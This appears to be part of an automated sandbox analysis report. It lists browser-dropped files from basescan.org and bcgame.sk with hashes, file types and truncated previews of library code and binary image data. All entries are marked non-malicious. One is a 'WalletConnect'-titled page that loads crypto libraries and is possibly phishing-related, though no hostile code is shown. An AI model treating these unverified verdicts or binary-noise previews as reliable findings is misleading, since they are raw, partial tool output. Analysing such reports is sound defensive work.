                                                                                                                                                                                                                                              SHA1:57F66D9636FB8991431FCE4AD0251D0A0938FA08
                                                                                                                                                                                                                                              SHA-256:D212730A69D5AC65DD46BC7E32E28DF80B5DE996696E29768979995054CDF4CC
                                                                                                                                                                                                                                              SHA-512:E3752B0EDE173D73C459FF076AF47A6F44A3FAF823F8E27A0CC5604D34E6238DFF2A247DB545A907065A517FBF99631875C3530257EC79CABE6266F5E08294C8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/jss/ace/ace.js
                                                                                                                                                                                                                                              Preview:(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAMESPACE="",e=function(){return this}();!e&&typeof window!="undefined"&&(e=window);if(!ACE_NAMESPACE&&typeof requirejs!="undefined")return;var t=function(e,n,r){if(typeof e!="string"){t.original?t.original.apply(this,arguments):(console.error("dropping module because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)return n&&n(),i}else if(Object.prototype.toString.call(t)==="[object Array]"){var o=[];for(var u=0,a=t.length;u<a;++u){var f=s(e,t[u]);if(f==undefined&&r.original)return;o.push(f)}return n&&n.apply(null,o)||!0}},r=function(e,t){var i=n("",e,t);return i==und
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3336
                                                                                                                                                                                                                                              Entropy (8bit):7.927018427429577
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Cygw3QvAWQ0jwUyshdFrRM+2fMyNq5n2UefB:P7aHbX9u+eB
                                                                                                                                                                                                                                              MD5:C9DE3967013A280EA240DAD1C760271A
                                                                                                                                                                                                                                              SHA1:BBE0B4F4178453B1A55F5D32CD6CAB8BF9253146
                                                                                                                                                                                                                                              SHA-256:E27B6E633B017D79F3AA94DCFC2768DCED9CA102AA65B159FF03D31F361B6DF1
                                                                                                                                                                                                                                              SHA-512:209CAD199AE80D252A23ED1DB3BE339D4ED7AFB8856660506FD3F6BD6F5B813B4F38BF98B5A8AB41DC8CE73A234D8B017B4589A006C3E9E97B6E88D6DF98FC84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....p.T....IDATx..KHTa...6%EEEA..-...E..".\D.&.!]T..m.4.T(2.."Z....02K.E...-^..R#..L....8_.10.Q......l...9.....Y^....A..j...e.......T..LP.g..W.K@e......E.?.g.J@m.5;e...r@.........rP..*b..+.FA...(.JO...@...2...T..E.(b...P......5/.D,.u...(.s^....2.A.......x....]P..L.:.*..2v.z.$.6..^...*/.W$.=..{I.\P7@Y.3.j.W.;.....:.K.+@..D..XUR.S..G........X.U.....YqM......tP..r.e7}...W^...............'.........[>G.l9.n....z&.pi..R....)!..|.F...J......6..oS.....8.U}.J[.D$N.W.-#.......X0S........*~aE5..;..../u[(.OG......fE...I.:.a.u.v(.1..cE...-.=R.(qKHC..um...2....U.@-p*c....".N.S!W.9..'....U7........G4.D.i...a..7.g^kg*c]....O:?Yx.".yW5.ZxZ..b.4.H..?~.+._..............^.../..AoA....Ca.P.,.B..i`...y.......X...DFFh...Y..^V.....^r....N...9{fa.i......7.....Q{....fhk.E....Q.Xde..K..\......6....f........n.. ..p...[d.2.*!=2.].......T=.%-...u.]n.A......\-AG..&...]PkW|..kc.../....Gb...(.6~...m.#.^.!...>.......lK.7.5>........../.?{.L..(Ak2*oK...u-.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65389), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):173633
                                                                                                                                                                                                                                              Entropy (8bit):4.709542963816273
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:LL/1EAqIkt7YuHo0DJP/t3uqTty5dWGFIibZbWu8IEiy6BRAXSCo1U+MFO3kAmFl:/1EdIkhYZCJPF3VslbaAAXf3
                                                                                                                                                                                                                                              MD5:2965D34D3104C5D2E47178D5674D8FED
                                                                                                                                                                                                                                              SHA1:4A9BFD5A99D062A56769E10AA60770C27AFEA0EE
                                                                                                                                                                                                                                              SHA-256:32FA81861A662F8F03701E2EE4048FC99ED0E43C8FFB5E5953EF01433FDED659
                                                                                                                                                                                                                                              SHA-512:417ACD1E0E9DD1A600E791ADF725FA66493810CCEBE395279723EADE095A2F9E91D5FAEA60563494CA3D9AFAB0E14F22E21560D14968E518CB2F9DE25E080830
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*!.. * Font Awesome Pro 5.13.0 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license (Commercial License).. */...fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8694
                                                                                                                                                                                                                                              Entropy (8bit):7.970664684641054
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:5x6dqvdmb100pRh1ur/gmcocGDVyMX/m14Y105XPYDr:/6dqV2jvhK4mc9aPgByXI
                                                                                                                                                                                                                                              MD5:815B2EC0C56EDC74A76908EF2BE41375
                                                                                                                                                                                                                                              SHA1:35848E10EB5E7DE7F4D254842E12FBC7878368C9
                                                                                                                                                                                                                                              SHA-256:8EEB00810583C061F623A076AD46E325E930D4197DB890064C0A774CA0493F0E
                                                                                                                                                                                                                                              SHA-512:81A019B415C0E3CE5B4B88D7A759789CE06923BBC2C1762BD98C43828003474E5F19A80F51924F509A62972567AAE9FC1C31C871695EC3402EC71568901971E6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/vip/badge-diamond.png
                                                                                                                                                                                                                                              Preview:RIFF.!..WEBPVP8L.!../..E...$G..?......q..]54.7..H....3..ffl*W......(.......f.Inb.v..u.....PRf....}......x....or.`...r.h ......H..@..UC.f.".A.N.,.i...5r....V RS$.y......"3aIJ....L0.&..#.H.<WU~.,.~$..k...p.M....q...?i.!..^u.;.....$.1.N..(.....z.C%..=..i.o.B/..K.B+..,...[#.Nd..3....&.!.....A]h...&w.-.(...j..*..^....jjw,.R%..y........cz..S....$%)...@......o..m.*.y...y.l.R.....;W.y.I..S..4._..w[......L.....o.q...5..D._.$.q.....@....m.].....s.%2J..Tus..n..e!D0..`...^g......"..Q......'.. i.|.o.]..m....n..!.9.(.$.2W.9.Q.BNE.S.].u.s......9FD.%J.U5...q]9..#"...m..4.....U..$.U...d:....#....+.T.>!... I....@.#.w8H6.w~.zm...y.?..$......."...O<..D....-...F.....7.Ix.`hfM.....i....^.....7 5I....8.........aQ.A..}.......?..(I......i.X|J..c.F...{..B.Q..O...wNN]..QQ..E.`I.6...O.J.TT|.1..%..d..=....m...!I..,>O<.......h..>...#mz..B....G0S[..I...'S.>..=......H..:.I..X.{.U......}..yQX*..Zv...Z.ZX$y....~...l.....{l.).xD.Lu.f.....1......'=#R.z.:.y..I...f.j.=Q
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12795), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):12795
                                                                                                                                                                                                                                              Entropy (8bit):5.023138147083958
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:kJ6DcTZ6oCCkC/wEvcqtZ02/Aw1vGgjnUQcw:kJKwll/wEvcV2/vvGkjf
                                                                                                                                                                                                                                              MD5:A2D42584292F64C5827E8B67B1B38726
                                                                                                                                                                                                                                              SHA1:1BE9B79BE02A1CFC5D96C4A5E0FEB8F472BABD95
                                                                                                                                                                                                                                              SHA-256:5736E3EEC0C34BFC288854B7B8D2A8F1E22E9E2E7DAE3C8D1AD5DFB2D4734AD0
                                                                                                                                                                                                                                              SHA-512:1FD8EB6628A8A5476C2E983DE00DF7DC47EE9A0501A4EF4C75BC52B5D7884E8F8A10831A35F1CDBF0CA38C325BF8444F6914BA0E9C9194A6EF3D46AC348B51CB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/fancybox/jquery.fancybox.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:body.compensate-for-scrollbar{overflow:hidden}.fancybox-active{height:auto}.fancybox-is-hidden{left:-9999px;margin:0;position:absolute!important;top:-9999px;visibility:hidden}.fancybox-container{-webkit-backface-visibility:hidden;height:100%;left:0;outline:none;position:fixed;-webkit-tap-highlight-color:transparent;top:0;-ms-touch-action:manipulation;touch-action:manipulation;transform:translateZ(0);width:100%;z-index:99992}.fancybox-container *{box-sizing:border-box}.fancybox-bg,.fancybox-inner,.fancybox-outer,.fancybox-stage{bottom:0;left:0;position:absolute;right:0;top:0}.fancybox-outer{-webkit-overflow-scrolling:touch;overflow-y:auto}.fancybox-bg{background:#1e1e1e;opacity:0;transition-duration:inherit;transition-property:opacity;transition-timing-function:cubic-bezier(.47,0,.74,.71)}.fancybox-is-open .fancybox-bg{opacity:.9;transition-timing-function:cubic-bezier(.22,.61,.36,1)}.fancybox-caption,.fancybox-infobar,.fancybox-navigation .fancybox-button,.fancybox-toolbar{direction:lt
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (798)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):799
                                                                                                                                                                                                                                              Entropy (8bit):5.0680263939742
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:JDvsSEcCaM5oNhFg+RAVseKSTrw9h/GdrmZXejaRsvJPF8e/CnvPAWY6gzfJ+y:JLstcCRYFDAVsDIrAJGd9j/JXMvPq6s5
                                                                                                                                                                                                                                              MD5:161868FAA5523780D8B7DDA32FE8FA94
                                                                                                                                                                                                                                              SHA1:843B060F3E985BE622C0664C65ED8D55C6D77FDE
                                                                                                                                                                                                                                              SHA-256:2F34BCDFF4C699B03A3C8516E7776BBE20D9A1511187A4DF1A2E9D21292EA3D1
                                                                                                                                                                                                                                              SHA-512:6CA2380F599A897DAFF87E2BE05EA2CB231EB587E914E0798A59F11AFA92873A1CBFBF579D4E0A893B221E415F56217B8920DFE06A8B03DBCD7CCCF9ABF6D41A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/isObject-909534d5.js
                                                                                                                                                                                                                                              Preview:var f=typeof global=="object"&&global&&global.Object===Object&&global;const l=f;var s=typeof self=="object"&&self&&self.Object===Object&&self,g=l||s||Function("return this")();const j=g;var u=j.Symbol;const o=u;var a=Object.prototype,y=a.hasOwnProperty,O=a.toString,e=o?o.toStringTag:void 0;function S(t){var r=y.call(t,e),c=t[e];try{t[e]=void 0;var i=!0}catch(m){}var b=O.call(t);return i&&(r?t[e]=c:delete t[e]),b}var d=Object.prototype,T=d.toString;function p(t){return T.call(t)}var v="[object Null]",$="[object Undefined]",n=o?o.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:n&&n in Object(t)?S(t):p(t)}function w(t){return t!=null&&typeof t=="object"}function P(t){var r=typeof t;return t!=null&&(r=="object"||r=="function")}export{o as S,w as a,h as b,l as f,P as i,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):312372
                                                                                                                                                                                                                                              Entropy (8bit):5.606759742813968
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:E4XApmFU7dli04d7z3KsOemveqNeX0fxnPT:tX5W7d4nhDUb
                                                                                                                                                                                                                                              MD5:FF23636DB2F466A3305D72016180D4C6
                                                                                                                                                                                                                                              SHA1:9B148D6F388E54C3326C837AF965ED6581200E17
                                                                                                                                                                                                                                              SHA-256:897399C836A4D8225C776B68C8CE0B9F09A527200E3691CAA3D5C9C65006AB52
                                                                                                                                                                                                                                              SHA-512:29D5E31FB524293A16642AA06E9EC50D34F26B3B561650C9F0968FCB862AA1081277998F0D6A2C8F6BBB6E4ECC7CD2F81A1AF1C1FEE75FFC992DDF194595D6B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":23,"vtp_rules":["list","bc\\.co","hash\\.game","bc\\.app","bc\\.fun","stake\\.game","blaze\\.game","bcga\\.me"],"tag_id":9},{"function":"__ogt_dma","priority":13,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":11},{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":""
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):171823
                                                                                                                                                                                                                                              Entropy (8bit):7.906689606092061
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:bpQDdF6d8BNSTvG7O0Zefqit5X7sFmfHWOttUMnpa+vk7lZOXhjXS+Kq+n9DV8JO:buDdqv8Reiit1YEfHfiMo8k5cXhjXSa0
                                                                                                                                                                                                                                              MD5:36AC17405F71E48F5BEFAEDF3B6737E8
                                                                                                                                                                                                                                              SHA1:A8AB2DCBB6A39163903814CB04D8986DAC9CF8C7
                                                                                                                                                                                                                                              SHA-256:2C713EED0F70C54740D0E7BD69D710995682C9763E39AB1A80ED300BC116B4DA
                                                                                                                                                                                                                                              SHA-512:5123CAEA1F8509803005B69169C4A25940676EAFE62E1A35AE37ED3AE39D4B7EC1722672B6950F4874DF20D2FED5E164F7DFDD97C471278FF3E9D75EEC98EF89
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.......~.....PLTE...........Y....W5.U.Y..s*..lB.q.r&..8.X.<.g..(.L...ya><.g.W...l..(b+..v.<.M..3.y..W....................y.........~.........k....n....s....a..x.......|..i..Y..o..u....A....T..g.`....n..P._.h...L.W.b....9.r.H.).H.\.Q..".c.W.E.L.......g.E.0.R.A....G..\....M.@.Y.@..I.7..g......=..U..E..;..O..@.=.....8..}........O..;..e..5..F..;.v.(..*..7..3..K..=.....2..3..(..&..:..E..1..`..F.."~....;.h..q...5../.u..~w.|..."..D....~..~;.~4.[..|..|9.wl.~..H..J.y0.|).x5.h..Z.t].q~.U..t@.G.I.x=.u4.x.c...Q..G.s3.r..nN.s .r..E.L..k?.p1.N.e..[..C.S..G.k!.A.g:.C.>.?.{Y|.Za.=.c&.;.~;.xJ..:.9.|:.s^=z9.8.x8.9.v7.w9.z5.t6.pIx.0.|,.r5.o4.y*.|..x*.w3.m;.m2.v*.u-.fAkh/.n/.n(.e..l*.b-.f+.b+._*.d$.](.Z2b]$.Z".Y .V$.S!.P .L..5.V0...2tRNS...%+CGISqpu{.....................................V..r...^IDATx....................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14018)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):14063
                                                                                                                                                                                                                                              Entropy (8bit):5.158170296059324
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:LkUvfdC/NqVgnUnsfWsfXsfdsfvH/Rs/qXxW3F2TO3BQd2N0+t92dene1R4s56V:LkUvVC/NqViU0fRuqB4x//GeneALV
                                                                                                                                                                                                                                              MD5:BAD6410B24F73A7135B596B027EA0E2A
                                                                                                                                                                                                                                              SHA1:0754CF53F3C36F122E2E4E31CD2BB07671B42171
                                                                                                                                                                                                                                              SHA-256:5C96906CC640B94DC35785F59F5707DCB727AAD9CC8AD77A3591FC049FD319A9
                                                                                                                                                                                                                                              SHA-512:F19261B25BBAFB16890E2A310F2FB75C95DC42C23CAE350F5A3E6511A55907A4CF68E2B4345BDC6792904F7FBE01A12F834721B0FA85327A2C8E2FF5E0B00C07
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/init-b19e21e0.js
                                                                                                                                                                                                                                              Preview:import{Y as r}from"./manifest-e71017e8.js";const t=`.pointer-events-none{pointer-events:none}.sticky{position:sticky}.inset-0{inset:0}.-bottom-1{bottom:-.25rem}.-bottom-1\\.5{bottom:-.375rem}.-left-3{left:-.75rem}.-left-3\\.5{left:-.875rem}.-top-1\\.5{top:-.375rem}.-top-2{top:-.5rem}.bottom-16{bottom:4rem}.bottom-2{bottom:.5rem}.bottom-2\\.5{bottom:.625rem}.bottom-5{bottom:1.25rem}.left-1{left:.25rem}.left-1\\.5{left:.375rem}.left-16{left:4rem}.left-3{left:.75rem}.left-4{left:1rem}.left-6{left:1.5rem}.right-3{right:.75rem}.right-4{right:1rem}.top-0\\.5{top:.125rem}.top-1{top:.25rem}.top-10{top:2.5rem}.top-15{top:3.75rem}.top-2{top:.5rem}.top-2\\.5{top:.625rem}.top-4{top:1rem}.top-6{top:1.5rem}.top-8{top:2rem}.top-\\[-1px\\]{top:-1px}.z-0{z-index:0}.z-20{z-index:20}.z-\\[11\\]{z-index:11}.z-\\[1\\]{z-index:1}.-mx-1{margin-left:-.25rem;margin-right:-.25rem}.mx-3{margin-left:.75rem;margin-right:.75rem}.mx-auto{margin-left:auto;margin-right:auto}.my-0{margin-top:0;margin-bottom:0}.my-1{mar
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (568)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):569
                                                                                                                                                                                                                                              Entropy (8bit):5.130899747920007
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:3m8HpiQ8aQ4swvifXtvqNW9MAucqmUDfAf3dlO:wEQX1qNWE7atw
                                                                                                                                                                                                                                              MD5:6AB3ED9BF3B332F6B79B1D30928B3930
                                                                                                                                                                                                                                              SHA1:4CCFB5884974B538B4DC992B29C3F13A6CC40A57
                                                                                                                                                                                                                                              SHA-256:4678890270E5092FC969675588DFD1CD1FBA88E3596ED2F20436E20B8CB35A31
                                                                                                                                                                                                                                              SHA-512:9D82FC0BD9B224B7AA31184E3DDF3FF36166F0EC996DB7DFBB5181E4DD7FF51BFFED34C02DCC2DDAAF930E125C2022A58BD90C6F5CB4988E6FB754CA1ACEDF37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/localization-extend-fdb9490f.js
                                                                                                                                                                                                                                              Preview:var e=Object.defineProperty,m=Object.defineProperties;var s=Object.getOwnPropertyDescriptors;var l=Object.getOwnPropertySymbols;var u=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var n=(o,a,t)=>a in o?e(o,a,{enumerable:!0,configurable:!0,writable:!0,value:t}):o[a]=t,r=(o,a)=>{for(var t in a||(a={}))u.call(a,t)&&n(o,t,a[t]);if(l)for(var t of l(a))p.call(a,t)&&n(o,t,a[t]);return o},c=(o,a)=>m(o,s(a));import{X as i,D as x}from"./manifest-51a3674f.js";const S=c(r({},i),{amount2localStr:(o,a)=>i.amount2localStr(new x(o),a)});export{S as l};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):74
                                                                                                                                                                                                                                              Entropy (8bit):4.7090098726965355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:CZm4R3mWIebqdveXbFy:IbRWW5bqdGQ
                                                                                                                                                                                                                                              MD5:F912A39D88D6DF3A7FF31638FC40EC00
                                                                                                                                                                                                                                              SHA1:05DBA80FB1DA1470F782119488726BAB1A60BD04
                                                                                                                                                                                                                                              SHA-256:9B663BC649909D6D468990A65268BCAE08E89104432955D1466B26927814424B
                                                                                                                                                                                                                                              SHA-512:5FB14F34CE7CE06D1C659167A39CB3EB869714383A95EC1FBEAE3356AAE5B20F92653066FC8C95F947EEE7A53E6129C2C0F1E7E7B776CD0E0F0441F8BE8A0CBD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const s="/modules/lottery2/assets/countries-7a4535f1.png";export{s as c};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (53742), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):53742
                                                                                                                                                                                                                                              Entropy (8bit):5.509891575554894
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ViajUwwofD46SMEgPawGGzMT3VA7Mbitokqx5sYiUdMEk/8s4Hd:ml5nbgok0sYiUdMET
                                                                                                                                                                                                                                              MD5:571AA9B070B19711C7687D069A134842
                                                                                                                                                                                                                                              SHA1:3D79B781F7EEF6366E9C218B87F3043BF1C151AD
                                                                                                                                                                                                                                              SHA-256:FB0765F427819D8869A6B2E77A3F2951CB24AB16F248D571DF225A918FAF7793
                                                                                                                                                                                                                                              SHA-512:30AB4699657B897C62C85D68CED88BC4B2A05B0E754919768C5807B63BC430F7A12062B0C884CAE6CE05CB3CE40C0808C9866A8C65EAC44F98F553F5140FFC53
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var HypeLab;(()=>{"use strict";var e={618:function(e,t,n){var i=this&&this.__awaiter||function(e,t,n,i){return new(n||(n=Promise))((function(o,s){function r(e){try{l(i.next(e))}catch(e){s(e)}}function a(e){try{l(i.throw(e))}catch(e){s(e)}}function l(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(r,a)}l((i=i.apply(e,t||[])).next())}))};Object.defineProperty(t,"__esModule",{value:!0}),t.trackEvent=t.loadAd=void 0;const o=n(55),s=n(5);function r(){const e=(0,o.getConfig)();if(e.baseUrl)return e.baseUrl;switch(e.environment){case"local":return"http://api.lvh.me:8080";case"development":return"https://api.hypelab-staging.com";case"production":return"https://api.hypelab.com"}}t.loadAd=function(e){return i(this,void 0,void 0,(function*(){const t=(0,o.getConfig)(),n=(0,o.getIdentity)(),i=(0,o.getFraud)();try{yield Promise.allSettled([n.refresh(),i.refresh()]);const a=document.body.clientWidth,l=document.body.clientHeight,d=yield fetch(new URL("/v1/reques
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1080)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1081
                                                                                                                                                                                                                                              Entropy (8bit):5.190134993701119
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:IN5YFHKjVmMwObBPjSfbG2BHCbM6qu61QiugD:rFHKjVmMw2JSD7Ocd1QrgD
                                                                                                                                                                                                                                              MD5:3333EC0A617A99B30A6B19FE3650EFBF
                                                                                                                                                                                                                                              SHA1:60D67C31A57BC93808D096AE98178D418150D218
                                                                                                                                                                                                                                              SHA-256:7389E885D838A350B54D4E28BAD3E7D80BBE8E718496D82BF6E6985526D4BE59
                                                                                                                                                                                                                                              SHA-512:9D0BD95F17A84B74CE42CC9AABF6FF43D22480ABCE22D173DFED74D59C62A8EFD603C99D803A640A3590B8B608AD3877F7EDD5B1BF13BBBAB4EA85D2D343B2F5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/debounce-f7740f4e.js
